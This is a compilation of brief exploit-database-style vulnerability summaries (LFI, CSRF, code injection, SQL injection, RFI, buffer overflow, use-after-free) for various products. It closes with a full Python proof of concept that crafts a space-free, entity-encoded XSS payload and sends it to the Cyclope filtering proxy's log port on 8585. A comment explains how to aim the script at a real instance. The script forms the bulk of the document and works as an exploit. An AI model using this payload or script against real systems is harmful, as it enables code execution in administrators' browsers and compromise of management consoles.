The file 'common.php' is vulnerable to LFI through the 'Accept-Language' HTTP header. This exploit sends '../../common' in the Accept-Language header so that common.php includes itself recursively, causing a denial of service through resource exhaustion.
InverseFlow v2.4 is vulnerable to CSRF attacks. An attacker can craft a malicious HTML page and send it to the victim; when the victim visits the page, the attacker is added as an admin user without any warning, and the password for the new account is sent to the attacker's email address.
The $sortby parameter passed to the 'masort' function isn't properly sanitized before being used in a call to create_function() at line 1080, which causes a PHP code injection vulnerability.
An attacker can exploit this vulnerability by sending malicious SQL queries to the vulnerable application. This can allow the attacker to bypass authentication and to access, modify or delete data within the database.
Sports PHool is vulnerable to Remote File Inclusion. This vulnerability allows an attacker to include a remote file containing arbitrary code, which is then executed on the web server. The exploit code takes two parameters, target and evil, which specify the target URL and the URL of the malicious file to be included. The malicious file contains a PHP script that executes the command specified in the cmd parameter.
The CEPMServer service is vulnerable to a denial of service attack when an abnormally large string is sent to it. This causes the service to crash, preventing it from logging user and computer names. The attack does not stop the filtering, but restoring the logging feature requires a complete re-installation of Cyclope.
The mentioned class contains the vulnerable SaveViewStateToFile() method, exposed through the typelib, which allows an attacker to create or overwrite files with arbitrary extensions in arbitrary locations. It was observed that the content of these files can be partially controlled by passing a remote file to the RestoreViewStateFromFile() method.
This module exploits a buffer overflow in HP Power Manager's 'formExportDataLogs'. By crafting a malformed request specifically for the fileName parameter, a stack-based buffer overflow occurs due to a long error message (which contains the fileName), which may result in arbitrary remote code execution in the context of 'SYSTEM'.
This exploit uses a combination of cloning objects, removing objects, and appending references to cause a Use After Free vulnerability in Opera 11.51 and previous versions. The exploit also uses a heap spray to increase the chances of a successful attack.
The Cyclope Internet Filtering Proxy is a whitelist/blacklist website navigation filtering application. It logs all of the client's activity, such as visited web sites and the time of each visit. There is an optional client application if the administrator wishes to acquire the computer name and user information. This XSS vulnerability is due to the fact that nothing is sanitized in the web-based management console. The whitelist and blacklist patterns, for example, are vulnerable, as are the computer name and user fields gathered via the logging port. This PoC takes advantage of the 'user' field (but it also works with the 'computer' field). One needs to send, in the correct order, <user>USER</user><computer>COMPUTER</computer><ip>IP ADDRESS</ip> to the default log port 8585. None of these fields is sanitized, which makes this XSS a bit more interesting: the attacking machine doesn't need the Cyclope client application installed. The payload is limited in what can be sent, since a space will break any code you send. HTML character codes will usually fix that problem, as well as the quotes and other special characters. So we can remotely insert our XSS payload and have it executed when the administrator looks over the logs.
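As an added example (not the original PoC and not Cyclope's own code), the script below builds the three-field record described above and delivers it to the log port. The <svg/onload=...> payload shape (a '/' in place of the forbidden space), the numeric character references used to keep spaces and quotes out of the handler body, the 127.0.0.1 capture listener used to run it offline, and the absence of any framing byte after </ip> are all assumptions, not details taken from the advisory.

```python
"""Added PoC helper for the Cyclope log-port XSS.

Not the advisory's exploit: it builds the <user><computer><ip> record the
advisory names and sends it over TCP. Payload shape, local capture
listener and record framing are assumptions.
"""
import socket
import threading

CYCLOPE_LOG_PORT = 8585  # default log port named in the advisory

# Characters that either break the raw record (space) or an unquoted
# attribute value (quotes, '>', '&', '<'), mapped to numeric character
# references the browser decodes again inside the attribute.
_ENTITY = {" ": "&#32;", '"': "&#34;", "'": "&#39;",
           "<": "&#60;", ">": "&#62;", "&": "&#38;"}


def entity_encode_js(js: str) -> str:
    """Per-character encoding, so nothing is double-encoded."""
    return "".join(_ENTITY.get(ch, ch) for ch in js)


def build_xss_payload(js: str) -> str:
    """Space-free markup: '/' stands in for the whitespace between the tag
    name and the attribute (assumed technique); the handler body carries
    no raw space or quote. Assumes the console renders the field as HTML."""
    return "<svg/onload=" + entity_encode_js(js) + ">"


def build_log_record(user: str, computer: str, ip: str) -> bytes:
    """Fields in the order the advisory requires; nothing is escaped,
    which is exactly what the vulnerability relies on."""
    return ("<user>%s</user><computer>%s</computer><ip>%s</ip>"
            % (user, computer, ip)).encode()


def send_record(host: str, port: int, record: bytes, timeout: float = 5.0) -> int:
    """Deliver one record and close; returns the number of bytes sent."""
    with socket.create_connection((host, port), timeout=timeout) as s:
        s.sendall(record)
    return len(record)


def start_capture_listener():
    """Local stand-in for the Cyclope log port (assumption: it just reads
    the raw bytes). Returns (port, box, thread); box[0] holds the record
    once the thread finishes."""
    srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    srv.bind(("127.0.0.1", 0))
    srv.listen(1)
    port = srv.getsockname()[1]
    box = []

    def run():
        conn, _ = srv.accept()
        with conn:
            chunks = []
            while True:
                data = conn.recv(4096)
                if not data:
                    break
                chunks.append(data)
            box.append(b"".join(chunks))
        srv.close()

    t = threading.Thread(target=run, daemon=True)
    t.start()
    return port, box, t


if __name__ == "__main__":
    # Offline demo against the local listener; point host/port at a real
    # Cyclope instance (CYCLOPE_LOG_PORT) to reproduce the advisory.
    port, box, t = start_capture_listener()
    payload = build_xss_payload('alert("cyclope xss")')
    record = build_log_record(payload, "PC-1", "10.0.0.5")
    send_record("127.0.0.1", port, record)
    t.join(5)
    print("sent   :", record.decode())
    print("capture:", box[0].decode() if box else "<nothing received>")
```

The payload injected here survives the space restriction because the browser only needs whitespace to separate a tag name from an attribute, which the '/' supplies, while everything inside the unquoted onload value is restored from the character references at parse time.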